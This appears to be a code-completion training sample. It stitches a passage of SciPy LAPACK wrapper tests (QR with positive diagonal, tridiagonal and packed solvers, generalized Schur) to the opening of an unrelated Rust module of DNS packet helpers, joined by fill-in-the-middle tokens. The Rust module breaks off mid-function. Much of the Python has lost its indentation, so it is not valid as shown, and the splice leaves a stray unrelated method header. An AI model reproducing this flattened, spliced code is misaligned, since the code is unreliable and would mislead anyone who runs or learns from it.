geqrfp = get_lapack_funcs(('geqrfp'), dtype=dtype)
gqr = get_lapack_funcs(("orgqr"), dtype=dtype)
m, n = matrix_size
    # create random matrix of dimensions m x n
A = generate_random_dtype_array((m, n), dtype=dtype)
# create qr matrix using geqrfp
qr_A, tau, info = geqrfp(A)
# obtain r from the upper triangular area
r = np.triu(qr_A)
# obtain q from the orgqr lapack routine
# based on linalg.qr's extraction strategy of q with orgqr
if m > n:
# this adds an extra column to the end of qr_A
# let qqr be an empty m x m matrix
qqr = np.zeros((m, m), dtype=dtype)
# set first n columns of qqr to qr_A
qqr[:, :n] = qr_A
# determine q from this qqr
        # note that m is sufficient for lwork based on LAPACK documentation
q = gqr(qqr, tau=tau, lwork=m)[0]
else:
q = gqr(qr_A[:, :m], tau=tau, lwork=m)[0]
# test that q and r still make A
assert_allclose(q@r, A, rtol=rtol)
# ensure that q is orthogonal (that q @ transposed q is the identity)
assert_allclose(np.eye(q.shape[0]), q@(q.conj().T), rtol=rtol,
atol=atol)
# ensure r is upper tri by comparing original r to r as upper triangular
assert_allclose(r, np.triu(r), rtol=rtol)
# make sure diagonals of r are positive for this random solution
assert_(np.all(np.diag(r) > np.zeros(len(np.diag(r)))))
# ensure that info is zero for this success
assert_(info == 0)
# test that this routine gives r diagonals that are positive for a
# matrix that returns negatives in the diagonal with scipy.linalg.rq
A_negative = generate_random_dtype_array((n, m), dtype=dtype) * -1
r_rq_neg, q_rq_neg = qr(A_negative)
rq_A_neg, tau_neg, info_neg = geqrfp(A_negative)
# assert that any of the entries on the diagonal from linalg.qr
# are negative and that all of geqrfp are positive.
assert_(np.any(np.diag(r_rq_neg) < 0) and
np.all(np.diag(r) > 0))
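# A minimal sketch (hypothetical matrix, not part of the original tests) of
# the convention tested above: A = Q @ R is unique only up to the signs of
# R's diagonal, so a generic QR routine may place negative entries there,
# while ?geqrfp pins them to be non-negative.
def _qr_sign_convention_sketch():
    A = np.diag([-2., -3.])
    q, r = qr(A)
    # any sign convention for r's diagonal still reproduces A
    assert_allclose(q @ r, A, atol=1e-12)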
def test_geqrfp_errors_with_empty_array():
# check that empty array raises good error message
A_empty = np.array([])
geqrfp = get_lapack_funcs('geqrfp', dtype=A_empty.dtype)
assert_raises(Exception, geqrfp, A_empty)
@pytest.mark.parametrize("driver", ['ev', 'evd', 'evr', 'evx'])
@pytest.mark.parametrize("pfx", ['sy', 'he'])
def test_standard_eigh_lworks(pfx, driver):
n = 1200 # Some sufficiently big arbitrary number
dtype = REAL_DTYPES if pfx == 'sy' else COMPLEX_DTYPES
sc_dlw = get_lapack_funcs(pfx+driver+'_lwork', dtype=dtype[0])
dz_dlw = get_lapack_funcs(pfx+driver+'_lwork', dtype=dtype[1])
try:
_compute_lwork(sc_dlw, n, lower=1)
_compute_lwork(dz_dlw, n, lower=1)
except Exception as e:
pytest.fail("{}_lwork raised unexpected exception: {}"
"".format(pfx+driver, e))
@pytest.mark.parametrize("driver", ['gv', 'gvx'])
@pytest.mark.parametrize("pfx", ['sy', 'he'])
def test_generalized_eigh_lworks(pfx, driver):
n = 1200 # Some sufficiently big arbitrary number
dtype = REAL_DTYPES if pfx == 'sy' else COMPLEX_DTYPES
sc_dlw = get_lapack_funcs(pfx+driver+'_lwork', dtype=dtype[0])
dz_dlw = get_lapack_funcs(pfx+driver+'_lwork', dtype=dtype[1])
# Shouldn't raise any exceptions
try:
_compute_lwork(sc_dlw, n, uplo="L")
_compute_lwork(dz_dlw, n, uplo="L")
except Exception as e:
pytest.fail("{}_lwork raised unexpected exception: {}"
"".format(pfx+driver, e))
@pytest.mark.parametrize("dtype_", DTYPES)
@pytest.mark.parametrize("m", [1, 10, 100, 1000])
def test_orcsd_uncsd_lwork(dtype_, m):
seed(1234)
p = randint(0, m)
q = m - p
pfx = 'or' if dtype_ in REAL_DTYPES else 'un'
dlw = pfx + 'csd_lwork'
lw = get_lapack_funcs(dlw, dtype=dtype_)
lwval = _compute_lwork(lw, m, p, q)
lwval = lwval if pfx == 'un' else (lwval,)
assert all([x > 0 for x in lwval])
@pytest.mark.parametrize("dtype_", DTYPES)
def test_orcsd_uncsd(dtype_):
m, p, q = 250, 80, 170
pfx = 'or' if dtype_ in REAL_DTYPES else 'un'
X = ortho_group.rvs(m) if pfx == 'or' else unitary_group.rvs(m)
drv, dlw = get_lapack_funcs((pfx + 'csd', pfx + 'csd_lwork'), dtype=dtype_)
lwval = _compute_lwork(dlw, m, p, q)
lwvals = {'lwork': lwval} if pfx == 'or' else dict(zip(['lwork',
'lrwork'], lwval))
cs11, cs12, cs21, cs22, theta, u1, u2, v1t, v2t, info =\
drv(X[:p, :q], X[:p, q:], X[p:, :q], X[p:, q:], **lwvals)
assert info == 0
U = block_diag(u1, u2)
VH = block_diag(v1t, v2t)
r = min(min(p, q), min(m-p, m-q))
n11 = min(p, q) - r
n12 = min(p, m-q) - r
n21 = min(m-p, q) - r
n22 = min(m-p, m-q) - r
S = np.zeros((m, m), dtype=dtype_)
one = dtype_(1.)
for i in range(n11):
S[i, i] = one
for i in range(n22):
S[p+i, q+i] = one
for i in range(n12):
S[i+n11+r, i+n11+r+n21+n22+r] = -one
for i in range(n21):
S[p+n22+r+i, n11+r+i] = one
for i in range(r):
S[i+n11, i+n11] = np.cos(theta[i])
S[p+n22+i, i+r+n21+n22] = np.cos(theta[i])
S[i+n11, i+n11+n21+n22+r] = -np.sin(theta[i])
S[p+n22+i, i+n11] = np.sin(theta[i])
Xc = U @ S @ VH
assert_allclose(X, Xc, rtol=0., atol=1e4*np.finfo(dtype_).eps)
@pytest.mark.parametrize("dtype", DTYPES)
@pytest.mark.parametrize("trans_bool", [False, True])
@pytest.mark.parametrize("fact", ["F", "N"])
def test_gtsvx(dtype, trans_bool, fact):
"""
    These tests use ?gtsvx to solve a random Ax=b system for each dtype.
It tests that the outputs define an LU matrix, that inputs are unmodified,
transposal options, incompatible shapes, singular matrices, and
singular factorizations. It parametrizes DTYPES and the 'fact' value along
with the fact related inputs.
"""
seed(42)
# set test tolerance appropriate for dtype
atol = 100 * np.finfo(dtype).eps
# obtain routine
gtsvx, gttrf = get_lapack_funcs(('gtsvx', 'gttrf'), dtype=dtype)
# Generate random tridiagonal matrix A
n = 10
dl = generate_random_dtype_array((n-1,), dtype=dtype)
d = generate_random_dtype_array((n,), dtype=dtype)
du = generate_random_dtype_array((n-1,), dtype=dtype)
A = np.diag(dl, -1) + np.diag(d) + np.diag(du, 1)
# generate random solution x
x = generate_random_dtype_array((n, 2), dtype=dtype)
# create b from x for equation Ax=b
trans = ("T" if dtype in REAL_DTYPES else "C") if trans_bool else "N"
b = (A.conj().T if trans_bool else A) @ x
# store a copy of the inputs to check they haven't been modified later
inputs_cpy = [dl.copy(), d.copy(), du.copy(), b.copy()]
# set these to None if fact = 'N', or the output of gttrf is fact = 'F'
dlf_, df_, duf_, du2f_, ipiv_, info_ = \
gttrf(dl, d, du) if fact == 'F' else [None]*6
gtsvx_out = gtsvx(dl, d, du, b, fact=fact, trans=trans, dlf=dlf_, df=df_,
duf=duf_, du2=du2f_, ipiv=ipiv_)
dlf, df, duf, du2f, ipiv, x_soln, rcond, ferr, berr, info = gtsvx_out
assert_(info == 0, "?gtsvx info = {}, should be zero".format(info))
# assure that inputs are unmodified
assert_array_equal(dl, inputs_cpy[0])
assert_array_equal(d, inputs_cpy[1])
assert_array_equal(du, inputs_cpy[2])
assert_array_equal(b, inputs_cpy[3])
# test that x_soln matches the expected x
assert_allclose(x, x_soln, atol=atol)
# assert that the outputs are of correct type or shape
# rcond should be a scalar
    assert_(not hasattr(rcond, "__len__"),
            "rcond should be scalar but is {}".format(rcond))
# ferr should be length of # of cols in x
    assert_(ferr.shape[0] == b.shape[1], "ferr.shape is {} but should be {}"
            .format(ferr.shape[0], b.shape[1]))
    # berr should be length of # of cols in x
    assert_(berr.shape[0] == b.shape[1], "berr.shape is {} but should be {}"
            .format(berr.shape[0], b.shape[1]))
@pytest.mark.parametrize("dtype", DTYPES)
@pytest.mark.parametrize("trans_bool", [0, 1])
@pytest.mark.parametrize("fact", ["F", "N"])
def test_gtsvx_error_singular(dtype, trans_bool, fact):
seed(42)
# obtain routine
gtsvx, gttrf = get_lapack_funcs(('gtsvx', 'gttrf'), dtype=dtype)
# Generate random tridiagonal matrix A
n = 10
dl = generate_random_dtype_array((n-1,), dtype=dtype)
d = generate_random_dtype_array((n,), dtype=dtype)
du = generate_random_dtype_array((n-1,), dtype=dtype)
A = np.diag(dl, -1) + np.diag(d) + np.diag(du, 1)
# generate random solution x
x = generate_random_dtype_array((n, 2), dtype=dtype)
# create b from x for equation Ax=b
trans = "T" if dtype in REAL_DTYPES else "C"
b = (A.conj().T if trans_bool else A) @ x
# set these to None if fact = 'N', or the output of gttrf is fact = 'F'
dlf_, df_, duf_, du2f_, ipiv_, info_ = \
gttrf(dl, d, du) if fact == 'F' else [None]*6
gtsvx_out = gtsvx(dl, d, du, b, fact=fact, trans=trans, dlf=dlf_, df=df_,
duf=duf_, du2=du2f_, ipiv=ipiv_)
dlf, df, duf, du2f, ipiv, x_soln, rcond, ferr, berr, info = gtsvx_out
# test with singular matrix
# no need to test inputs with fact "F" since ?gttrf already does.
if fact == "N":
# Construct a singular example manually
d[-1] = 0
dl[-1] = 0
# solve using routine
gtsvx_out = gtsvx(dl, d, du, b)
dlf, df, duf, du2f, ipiv, x_soln, rcond, ferr, berr, info = gtsvx_out
# test for the singular matrix.
assert info > 0, "info should be > 0 for singular matrix"
elif fact == 'F':
# assuming that a singular factorization is input
df_[-1] = 0
duf_[-1] = 0
du2f_[-1] = 0
gtsvx_out = gtsvx(dl, d, du, b, fact=fact, dlf=dlf_, df=df_, duf=duf_,
du2=du2f_, ipiv=ipiv_)
dlf, df, duf, du2f, ipiv, x_soln, rcond, ferr, berr, info = gtsvx_out
# info should not be zero and should provide index of illegal value
assert info > 0, "info should be > 0 for singular matrix"
@pytest.mark.parametrize("dtype", DTYPES*2)
@pytest.mark.parametrize("trans_bool", [False, True])
@pytest.mark.parametrize("fact", ["F", "N"])
def test_gtsvx_error_incompatible_size(dtype, trans_bool, fact):
seed(42)
# obtain routine
gtsvx, gttrf = get_lapack_funcs(('gtsvx', 'gttrf'), dtype=dtype)
# Generate random tridiagonal matrix A
n = 10
dl = generate_random_dtype_array((n-1,), dtype=dtype)
d = generate_random_dtype_array((n,), dtype=dtype)
du = generate_random_dtype_array((n-1,), dtype=dtype)
A = np.diag(dl, -1) + np.diag(d) + np.diag(du, 1)
# generate random solution x
x = generate_random_dtype_array((n, 2), dtype=dtype)
# create b from x for equation Ax=b
trans = "T" if dtype in REAL_DTYPES else "C"
b = (A.conj().T if trans_bool else A) @ x
# set these to None if fact = 'N', or the output of gttrf is fact = 'F'
dlf_, df_, duf_, du2f_, ipiv_, info_ = \
gttrf(dl, d, du) if fact == 'F' else [None]*6
if fact == "N":
assert_raises(ValueError, gtsvx, dl[:-1], d, du, b,
fact=fact, trans=trans, dlf=dlf_, df=df_,
duf=duf_, du2=du2f_, ipiv=ipiv_)
assert_raises(ValueError, gtsvx, dl, d[:-1], du, b,
fact=fact, trans=trans, dlf=dlf_, df=df_,
duf=duf_, du2=du2f_, ipiv=ipiv_)
assert_raises(ValueError, gtsvx, dl, d, du[:-1], b,
fact=fact, trans=trans, dlf=dlf_, df=df_,
duf=duf_, du2=du2f_, ipiv=ipiv_)
assert_raises(Exception, gtsvx, dl, d, du, b[:-1],
fact=fact, trans=trans, dlf=dlf_, df=df_,
duf=duf_, du2=du2f_, ipiv=ipiv_)
else:
assert_raises(ValueError, gtsvx, dl, d, du, b,
fact=fact, trans=trans, dlf=dlf_[:-1], df=df_,
duf=duf_, du2=du2f_, ipiv=ipiv_)
assert_raises(ValueError, gtsvx, dl, d, du, b,
fact=fact, trans=trans, dlf=dlf_, df=df_[:-1],
duf=duf_, du2=du2f_, ipiv=ipiv_)
assert_raises(ValueError, gtsvx, dl, d, du, b,
fact=fact, trans=trans, dlf=dlf_, df=df_,
duf=duf_[:-1], du2=du2f_, ipiv=ipiv_)
assert_raises(ValueError, gtsvx, dl, d, du, b,
fact=fact, trans=trans, dlf=dlf_, df=df_,
duf=duf_, du2=du2f_[:-1], ipiv=ipiv_)
@pytest.mark.parametrize("du,d,dl,b,x",
[(np.array([2.1, -1.0, 1.9, 8.0]),
np.array([3.0, 2.3, -5.0, -0.9, 7.1]),
np.array([3.4, 3.6, 7.0, -6.0]),
np.array([[2.7, 6.6], [-.5, 10.8], [2.6, -3.2],
[.6, -11.2], [2.7, 19.1]]),
np.array([[-4, 5], [7, -4], [3, -3], [-4, -2],
[-3, 1]])),
(np.array([2 - 1j, 2 + 1j, -1 + 1j, 1 - 1j]),
np.array([-1.3 + 1.3j, -1.3 + 1.3j, -1.3 + 3.3j,
-.3 + 4.3j, -3.3 + 1.3j]),
np.array([1 - 2j, 1 + 1j, 2 - 3j, 1 + 1j]),
np.array([[2.4 - 5j, 2.7 + 6.9j],
[3.4 + 18.2j, -6.9 - 5.3j],
[-14.7 + 9.7j, -6 - .6j],
[31.9 - 7.7j, -3.9 + 9.3j],
[-1 + 1.6j, -3 + 12.2j]]),
np.array([[1 + 1j, 2 - 1j], [3 - 1j, 1 + 2j],
[4 + 5j, -1 + 1j], [-1 - 2j, 2 + 1j],
[1 - 1j, 2 - 2j]]))])
def test_gtsvx_NAG(du, d, dl, b, x):
# Test to ensure wrapper is consistent with NAG Manual Mark 26
# example problems: real (f07cbf) and complex (f07cpf)
gtsvx = get_lapack_funcs('gtsvx', dtype=d.dtype)
gtsvx_out = gtsvx(dl, d, du, b)
dlf, df, duf, du2f, ipiv, x_soln, rcond, ferr, berr, info = gtsvx_out
assert_array_almost_equal(x, x_soln)
@pytest.mark.parametrize("dtype,realtype", zip(DTYPES, REAL_DTYPES
+ REAL_DTYPES))
@pytest.mark.parametrize("fact,df_de_lambda",
[("F",
lambda d, e:get_lapack_funcs('pttrf',
dtype=e.dtype)(d, e)),
("N", lambda d, e: (None, None, None))])
def test_ptsvx(dtype, realtype, fact, df_de_lambda):
'''
This tests the ?ptsvx lapack routine wrapper to solve a random system
Ax = b for all dtypes and input variations. Tests for: unmodified
input parameters, fact options, incompatible matrix shapes raise an error,
and singular matrices return info of illegal value.
'''
seed(42)
# set test tolerance appropriate for dtype
atol = 100 * np.finfo(dtype).eps
ptsvx = get_lapack_funcs('ptsvx', dtype=dtype)
n = 5
# create diagonals according to size and dtype
d = generate_random_dtype_array((n,), realtype) + 4
e = generate_random_dtype_array((n-1,), dtype)
A = np.diag(d) + np.diag(e, -1) + np.diag(np.conj(e), 1)
x_soln = generate_random_dtype_array((n, 2), dtype=dtype)
b = A @ x_soln
# use lambda to determine what df, ef are
df, ef, info = df_de_lambda(d, e)
# create copy to later test that they are unmodified
diag_cpy = [d.copy(), e.copy(), b.copy()]
# solve using routine
df, ef, x, rcond, ferr, berr, info = ptsvx(d, e, b, fact=fact,
df=df, ef=ef)
# d, e, and b should be unmodified
assert_array_equal(d, diag_cpy[0])
assert_array_equal(e, diag_cpy[1])
assert_array_equal(b, diag_cpy[2])
assert_(info == 0, "info should be 0 but is {}.".format(info))
assert_array_almost_equal(x_soln, x)
# test that the factors from ptsvx can be recombined to make A
L = np.diag(ef, -1) + np.diag(np.ones(n))
D = np.diag(df)
assert_allclose(A, L@D@(np.conj(L).T), atol=atol)
# assert that the outputs are of correct type or shape
# rcond should be a scalar
assert not hasattr(rcond, "__len__"), \
"rcond should be scalar but is {}".format(rcond)
# ferr should be length of # of cols in x
    assert_(ferr.shape == (2,), "ferr.shape is {} but should be ({},)"
            .format(ferr.shape, x_soln.shape[1]))
    # berr should be length of # of cols in x
    assert_(berr.shape == (2,), "berr.shape is {} but should be ({},)"
            .format(berr.shape, x_soln.shape[1]))
@pytest.mark.parametrize("dtype,realtype", zip(DTYPES, REAL_DTYPES
+ REAL_DTYPES))
@pytest.mark.parametrize("fact,df_de_lambda",
[("F",
lambda d, e:get_lapack_funcs('pttrf',
dtype=e.dtype)(d, e)),
("N", lambda d, e: (None, None, None))])
def test_ptsvx_error_raise_errors(dtype, realtype, fact, df_de_lambda):
seed(42)
ptsvx = get_lapack_funcs('ptsvx', dtype=dtype)
n = 5
# create diagonals according to size and dtype
d = generate_random_dtype_array((n,), realtype) + 4
e = generate_random_dtype_array((n-1,), dtype)
A = np.diag(d) + np.diag(e, -1) + np.diag(np.conj(e), 1)
x_soln = generate_random_dtype_array((n, 2), dtype=dtype)
b = A @ x_soln
# use lambda to determine what df, ef are
df, ef, info = df_de_lambda(d, e)
# test with malformatted array sizes
assert_raises(ValueError, ptsvx, d[:-1], e, b, fact=fact, df=df, ef=ef)
assert_raises(ValueError, ptsvx, d, e[:-1], b, fact=fact, df=df, ef=ef)
assert_raises(Exception, ptsvx, d, e, b[:-1], fact=fact, df=df, ef=ef)
@pytest.mark.parametrize("dtype,realtype", zip(DTYPES, REAL_DTYPES
+ REAL_DTYPES))
@pytest.mark.parametrize("fact,df_de_lambda",
[("F",
lambda d, e:get_lapack_funcs('pttrf',
dtype=e.dtype)(d, e)),
("N", lambda d, e: (None, None, None))])
def test_ptsvx_non_SPD_singular(dtype, realtype, fact, df_de_lambda):
seed(42)
ptsvx = get_lapack_funcs('ptsvx', dtype=dtype)
n = 5
# create diagonals according to size and dtype
d = generate_random_dtype_array((n,), realtype) + 4
e = generate_random_dtype_array((n-1,), dtype)
A = np.diag(d) + np.diag(e, -1) + np.diag(np.conj(e), 1)
x_soln = generate_random_dtype_array((n, 2), dtype=dtype)
b = A @ x_soln
# use lambda to determine what df, ef are
df, ef, info = df_de_lambda(d, e)
if fact == "N":
d[3] = 0
# obtain new df, ef
df, ef, info = df_de_lambda(d, e)
# solve using routine
df, ef, x, rcond, ferr, berr, info = ptsvx(d, e, b)
# test for the singular matrix.
assert info > 0 and info <= n
# non SPD matrix
d = generate_random_dtype_array((n,), realtype)
df, ef, x, rcond, ferr, berr, info = ptsvx(d, e, b)
assert info > 0 and info <= n
else:
# assuming that someone is using a singular factorization
df, ef, info = df_de_lambda(d, e)
df[0] = 0
ef[0] = 0
df, ef, x, rcond, ferr, berr, info = ptsvx(d, e, b, fact=fact,
df=df, ef=ef)
assert info > 0
@pytest.mark.parametrize('d,e,b,x',
[(np.array([4, 10, 29, 25, 5]),
np.array([-2, -6, 15, 8]),
np.array([[6, 10], [9, 4], [2, 9], [14, 65],
[7, 23]]),
np.array([[2.5, 2], [2, -1], [1, -3],
[-1, 6], [3, -5]])),
(np.array([16, 41, 46, 21]),
np.array([16 + 16j, 18 - 9j, 1 - 4j]),
np.array([[64 + 16j, -16 - 32j],
[93 + 62j, 61 - 66j],
[78 - 80j, 71 - 74j],
[14 - 27j, 35 + 15j]]),
np.array([[2 + 1j, -3 - 2j],
[1 + 1j, 1 + 1j],
[1 - 2j, 1 - 2j],
[1 - 1j, 2 + 1j]]))])
def test_ptsvx_NAG(d, e, b, x):
    # test to ensure that the wrapper is consistent with NAG Manual Mark 26
    # example problems: f07jbf, f07jpf
# (Links expire, so please search for "NAG Library Manual Mark 26" online)
# obtain routine with correct type based on e.dtype
ptsvx = get_lapack_funcs('ptsvx', dtype=e.dtype)
# solve using routine
df, ef, x_ptsvx, rcond, ferr, berr, info = ptsvx(d, e, b)
    # check that ptsvx's solution matches the expected x
assert_array_almost_equal(x, x_ptsvx)
@pytest.mark.parametrize('lower', [False, True])
@pytest.mark.parametrize('dtype', DTYPES)
def test_pptrs_pptri_pptrf_ppsv_ppcon(dtype, lower):
seed(1234)
atol = np.finfo(dtype).eps*100
# Manual conversion to/from packed format is feasible here.
n, nrhs = 10, 4
a = generate_random_dtype_array([n, n], dtype=dtype)
b = generate_random_dtype_array([n, nrhs], dtype=dtype)
a = a.conj().T + a + np.eye(n, dtype=dtype) * dtype(5.)
if lower:
inds = ([x for y in range(n) for x in range(y, n)],
[y for y in range(n) for x in range(y, n)])
else:
inds = ([x for y in range(1, n+1) for x in range(y)],
[y-1 for y in range(1, n+1) for x in range(y)])
ap = a[inds]
ppsv, pptrf, pptrs, pptri, ppcon = get_lapack_funcs(
('ppsv', 'pptrf', 'pptrs', 'pptri', 'ppcon'),
dtype=dtype,
ilp64="preferred")
ul, info = pptrf(n, ap, lower=lower)
assert_equal(info, 0)
aul = cholesky(a, lower=lower)[inds]
assert_allclose(ul, aul, rtol=0, atol=atol)
uli, info = pptri(n, ul, lower=lower)
assert_equal(info, 0)
auli = inv(a)[inds]
assert_allclose(uli, auli, rtol=0, atol=atol)
x, info = pptrs(n, ul, b, lower=lower)
assert_equal(info, 0)
bx = solve(a, b)
assert_allclose(x, bx, rtol=0, atol=atol)
xv, info = ppsv(n, ap, b, lower=lower)
assert_equal(info, 0)
assert_allclose(xv, bx, rtol=0, atol=atol)
anorm = np.linalg.norm(a, 1)
rcond, info = ppcon(n, ap, anorm=anorm, lower=lower)
assert_equal(info, 0)
assert_(abs(1/rcond - np.linalg.cond(a, p=1))*rcond < 1)
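# Minimal sketch (hypothetical values) of the packed "pp" storage used
# above: only one triangle of the symmetric matrix is stored, column by
# column, so an n x n matrix flattens to n*(n+1)/2 entries.
def _packed_storage_sketch():
    n = 3
    a = np.array([[1., 2., 4.],
                  [2., 3., 5.],
                  [4., 5., 6.]])
    # upper triangle, column-major, as built by the lower=False branch above
    inds = ([x for y in range(1, n+1) for x in range(y)],
            [y-1 for y in range(1, n+1) for x in range(y)])
    assert_array_equal(a[inds], [1., 2., 3., 4., 5., 6.])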
@pytest.mark.parametrize('dtype', DTYPES)
def test_gges_tgexc(dtype):
seed(1234)
atol = np.finfo(dtype).eps*100
n = 10
a = generate_random_dtype_array([n, n], dtype=dtype)
b = generate_random_dtype_array([n, n], dtype=dtype)
gges, tgexc = get_lapack_funcs(('gges', 'tgexc'), dtype=dtype)
result = gges(lambda x: None, a, b, overwrite_a=False, overwrite_b=False)
assert_equal(result[-1], 0)
s = result[0]
t = result[1]
q = result[-4]
z = result[-3]
d1 = s[0, 0] / t[0, 0]
d2 = s[6, 6] / t[6, 6]
if dtype in COMPLEX_DTYPES:
assert_allclose(s, np.triu(s), rtol=0, atol=atol)
assert_allclose(t, np.triu(t), rtol=0, atol=atol)
assert_allclose(q @ s @ z.conj().T, a, rtol=0, atol=atol)
assert_allclose(q @ t @ z.conj().T, b, rtol=0, atol=atol)
result = tgexc(s, t, q, z, 6, 0)
assert_equal(result[-1], 0)
s = result[0]
t = result[1]
q = result[2]
z = result[3]
if dtype in COMPLEX_DTYPES:
assert_allclose(s, np.triu(s), rtol=0, atol=atol)
assert_allclose(t, np.triu(t), rtol=0, atol=atol)
assert_allclose(q @ s @ z.conj().T, a, rtol=0, atol=atol)
assert_allclose(q @ t @ z.conj().T, b, rtol=0, atol=atol)
assert_allclose(s[0, 0] / t[0, 0], d2, rtol=0, atol=atol)
assert_allclose(s[1, 1] / t[1, 1], d1, rtol=0, atol=atol)<|fim▁end|> |
def test_ticket_1645(self): |
<|file_name|>dns.rs<|end_file_name|><|fim▁begin|>//! Helpers for parsing DNS packets, modifying properties, and building
//! common responses.
use rand::random;
use std::fmt;
use std::io::Write;
use super::{DNS_UDP_NOEDNS0_MAX_SIZE, DNS_QUERY_MIN_SIZE};
pub const DNS_CLASS_CH: u16 = 3;
pub const DNS_CLASS_IN: u16 = 1;
pub const DNS_HEADER_SIZE: usize = 12;
pub const DNS_MAX_HOSTNAME_LEN: usize = 255;
pub const DNS_MAX_PACKET_SIZE: usize = 65535;
pub const DNS_OFFSET_EDNS_DO: usize = 6;
pub const DNS_OFFSET_EDNS_PAYLOAD_SIZE: usize = 2;
pub const DNS_OFFSET_EDNS_TYPE: usize = 0;
pub const DNS_OFFSET_QUESTION: usize = DNS_HEADER_SIZE;
pub const DNS_QTYPE_PLUS_QCLASS_LEN: usize = 4;
pub const DNS_RCODE_NXDOMAIN: u8 = 3;
pub const DNS_RCODE_REFUSED: u8 = 5;
pub const DNS_RCODE_SERVFAIL: u8 = 2;
pub const DNS_TYPE_ANY: u16 = 255;
pub const DNS_TYPE_HINFO: u16 = 13;
pub const DNS_TYPE_OPT: u16 = 41;
pub const DNS_TYPE_SOA: u16 = 6;
pub const DNS_TYPE_TXT: u16 = 16;
#[derive(Clone, Debug)]
pub struct NormalizedQuestion {
pub qname: Vec<u8>,
pub tid: u16,
pub flags: u16,
pub payload_size: u16,
pub qtype: u16,
pub qclass: u16,
pub labels_count: u16,
pub dnssec: bool,
}
#[derive(Clone, Debug, Hash, Eq, PartialEq)]
pub struct NormalizedQuestionKey {
pub qname_lc: Vec<u8>,
pub qtype: u16,
pub qclass: u16,
pub dnssec: bool,
}
#[derive(Debug, Hash, Eq, PartialEq)]
pub struct NormalizedQuestionMinimal {
pub qname: Vec<u8>,
pub tid: u16,
pub qtype: u16,
pub qclass: u16,
}
#[inline]
pub fn tid(packet: &[u8]) -> u16 {
((packet[0] as u16) << 8) | packet[1] as u16
}
#[inline]
pub fn set_tid(packet: &mut [u8], value: u16) {
packet[0] = (value >> 8) as u8;
packet[1] = value as u8;
}
#[inline]
pub fn flags(packet: &[u8]) -> u16 {
((packet[2] as u16) << 8) | packet[3] as u16
}
#[allow(dead_code)]
#[inline]
pub fn rd(packet: &[u8]) -> bool {
packet[2] & 0x1 != 0
}
#[inline]
pub fn set_rd(packet: &mut [u8], state: bool) {
packet[2] |= state as u8;
}
#[allow(dead_code)]
#[inline]
pub fn tc(packet: &[u8]) -> bool {
packet[2] & 0x2 != 0
}
#[inline]
pub fn set_tc(packet: &mut [u8], state: bool) {
packet[2] |= 0x2 * (state as u8);
}
#[allow(dead_code)]
#[inline]
pub fn aa(packet: &[u8]) -> bool {
packet[2] & 0x4 != 0
}
#[inline]
pub fn set_aa(packet: &mut [u8], state: bool) {
packet[2] |= 0x4 * (state as u8);
}
#[allow(dead_code)]
#[inline]
pub fn opcode(packet: &[u8]) -> u8 {
(packet[2] & 0x78) >> 3
}
#[inline]
pub fn qr(packet: &[u8]) -> bool {
packet[2] & 0x80 != 0
}
#[inline]
pub fn set_qr(packet: &mut [u8], state: bool) {
packet[2] |= 0x80 * (state as u8);
}
#[inline]
pub fn rcode(packet: &[u8]) -> u8 {
packet[3] & 0xf
}
#[inline]
pub fn set_rcode(packet: &mut [u8], value: u8) {
debug_assert!(value <= 0xf);
packet[3] &= !0xf;
packet[3] |= value & 0xf;
}
#[allow(dead_code)]
#[inline]
pub fn cd(packet: &[u8]) -> bool {
packet[3] & 0x10 != 0
}
#[allow(dead_code)]
#[inline]
pub fn ad(packet: &[u8]) -> bool {
packet[3] & 0x20 != 0
}
#[allow(dead_code)]
#[inline]
pub fn z(packet: &[u8]) -> bool {
packet[3] & 0x40 != 0
}
#[allow(dead_code)]
#[inline]
pub fn ra(packet: &[u8]) -> bool {
packet[3] & 0x80 != 0
}
#[inline]
pub fn qdcount(packet: &[u8]) -> u16 {
((packet[4] as u16) << 8) | packet[5] as u16
}
#[inline]
pub fn set_qdcount(packet: &mut [u8], value: u16) {
packet[4] = (value >> 8) as u8;
packet[5] = value as u8;
}
#[inline]
pub fn ancount(packet: &[u8]) -> u16 {
((packet[6] as u16) << 8) | packet[7] as u16
}
#[inline]
pub fn set_ancount(packet: &mut [u8], value: u16) {
packet[6] = (value >> 8) as u8;
packet[7] = value as u8;
}
#[inline]
pub fn nscount(packet: &[u8]) -> u16 {
((packet[8] as u16) << 8) | packet[9] as u16
}
#[allow(dead_code)]
#[inline]
pub fn set_nscount(packet: &mut [u8], value: u16) {
packet[8] = (value >> 8) as u8;
packet[9] = value as u8;
}
#[inline]
pub fn arcount(packet: &[u8]) -> u16 {
((packet[10] as u16) << 8) | packet[11] as u16
}
#[inline]
pub fn set_arcount(packet: &mut [u8], value: u16) {
packet[10] = (value >> 8) as u8;
packet[11] = value as u8;
}
pub fn overwrite_qname(packet: &mut [u8], qname: &[u8]) {
let packet_len = packet.len();
debug_assert!(packet_len >= DNS_OFFSET_QUESTION);
if packet_len <= DNS_OFFSET_QUESTION {
return;
}
debug_assert_eq!(qdcount(packet), 1);
if qdcount(packet) < 1 {
return;
}
let qname_len = qname.len();
let mut to = &mut packet[DNS_OFFSET_QUESTION..];
if to.len() <= qname_len {
return;
}
assert_eq!(to[qname_len], 0);
let _ = to.write(qname).unwrap();
}
pub struct QuestionRR<'t> {
qname: &'t [u8],
qtype: u16,
qclass: u16,
labels_count: u16,
}
pub fn question(packet: &[u8]) -> Result<QuestionRR, &'static str> {
let packet_len = packet.len();
if packet_len <= DNS_OFFSET_QUESTION {
return Err("Short packet");
}
let (offset, labels_count) = match skip_name(packet, DNS_OFFSET_QUESTION) {
Ok(offset_and_labels) => offset_and_labels,
Err(e) => return Err(e),
};
assert!(offset > DNS_OFFSET_QUESTION);
let qname = &packet[DNS_OFFSET_QUESTION..offset - 1];
if 4 > packet_len - offset {
return Err("Short packet");
}
let qtype = (packet[offset] as u16) << 8 | packet[offset + 1] as u16;
let qclass = (packet[offset + 2] as u16) << 8 | packet[offset + 3] as u16;
let question_rr = QuestionRR {
qname: qname,
qtype: qtype,
qclass: qclass,
labels_count: labels_count,
};
Ok(question_rr)
}
fn skip_name(packet: &[u8], offset: usize) -> Result<(usize, u16), &'static str> {
let packet_len = packet.len();
if offset >= packet_len - 1 {
return Err("Short packet");
}
let mut name_len: usize = 0;
let mut offset = offset;
let mut labels_count = 0u16;
loop {
let label_len = match packet[offset] {
len if len & 0xc0 == 0xc0 => {
if 2 > packet_len - offset {
return Err("Incomplete offset");
}
offset += 2;
break;
}
len if len > 0x3f => return Err("Label too long"),
len => len,
} as usize;
if label_len >= packet_len - offset - 1 {
return Err("Malformed packet with an out-of-bounds name");
}
name_len += label_len + 1;
